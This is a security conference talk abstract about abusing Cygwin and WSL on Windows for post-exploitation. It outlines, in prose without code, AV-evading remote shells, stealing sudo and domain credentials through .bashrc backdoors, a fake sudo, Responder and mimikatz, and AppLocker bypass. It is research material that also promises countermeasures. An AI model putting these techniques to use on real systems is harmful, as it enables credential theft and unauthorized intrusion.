»Abusing Bash for Windows«
2018-10-17, 10:30–10:50, Europe

This presentation showcases how to use bash on Windows (Cygwin, WSL) for privilege escalation and post-exploitation. Tricks that will be presented here use existing tool features: no vulnerabilities/0days will be exploited. We also assume that you can already execute code on the target.

Bash equivalent is available on Windows since 2001 through Cygwin (https://www.cygwin.com/). With Windows 10 an alternative is possible: WSL (https://github.com/Microsoft/WSL). These tools are interesting for an attacker because they are used by both administrators and developers. This talk is about using them in order to perform privilege escalation or post-exploitation.

Everything here assume that you can already execute code on the target.

No vulnerabilities/0days will be exploited.

The introduction will present the different ways of having bash on Windows (Cygwin and WSL): - installation process, - APT/YUM like tools, - possibles interactions between Windows CMD and Cygwin/WSL, - edit "Linux" file system from Windows.

This Introduction is particularly important. Indeed, many tricks are based on internal functions and mechanisms of Cygwin and WSL.

Then, multiple cases will be studied:

Remote shell with AV bypass

Is it possible to use Cygwin or WSL to have a remote shell? Can it be persistent? Which remote shell can be natively used? On WSL this is a good way to bypass some AV.

Get sudo hash (on WSL)

This is based on the fact that on WSL you need to sudo for reading /etc/shadow file. But this file is in the Windows user directory (). So you can read it directly from Windows. Then if you're lucky enough to crack the password you can hope that the user reused it somewhere else (for example for its local Windows admin password).

Backdoor bash for hash and passwords

All these stuff are based on a classical trick: adding stuff in .bashrc.

Adding an alias

An alias is added to .bashrc. Then a backdoored version of the program is dropped. Each time the user will call the program from the PATH, the backdoored version will be launched.

Adding a startup script

A script is added at WSL/Cygwin startup. By using interaction between the Cygwin/WSL shell and the Windows world it is possible to grab data.

Below a list of malicious actions possible

  • Get WSL sudo password: add a fake sudo program in order to steal the password
  • Get domain hash: call cacls.exe (or equivalent, list available here: https://gist.github.com/anonymous/70f792d50078f0ee795d39d0aa0da46e) in order to get send NTLMv2 authentication request through the network. Responder (or equivalent / https://github.com/SpiderLabs/Responder) must be listening on the called network service.
  • Get domain password: call a fake Windows authentication window or ask prompt directly in the shell. Beware, this can look really suspicious because devs or admins (targets here), may known well inner working of the system..
  • Get local admin privilege: call runas in order to have a local admin binary running (mimikatz for example). This is also especially likely to trigger suspicions.

Applocker bypass

This part is still in research, conclusion will be provided even if there are no bypass possible. My aim here is to abuse AppLocker configuration in order to run unwanted program on the target.

As many points are based on features from Cygwin and WSL, countermeasure are not necessary obvious. They will be discussed at the end of the talk.

I can also provide in addition jail escaping tricks on Linux that will be tested on the UNIX tools portage for Windows (gVIM, GnuWin32, UnxUtils). These additional slides will not be detailed during the talk but tricks will be available for interested people.

See also: None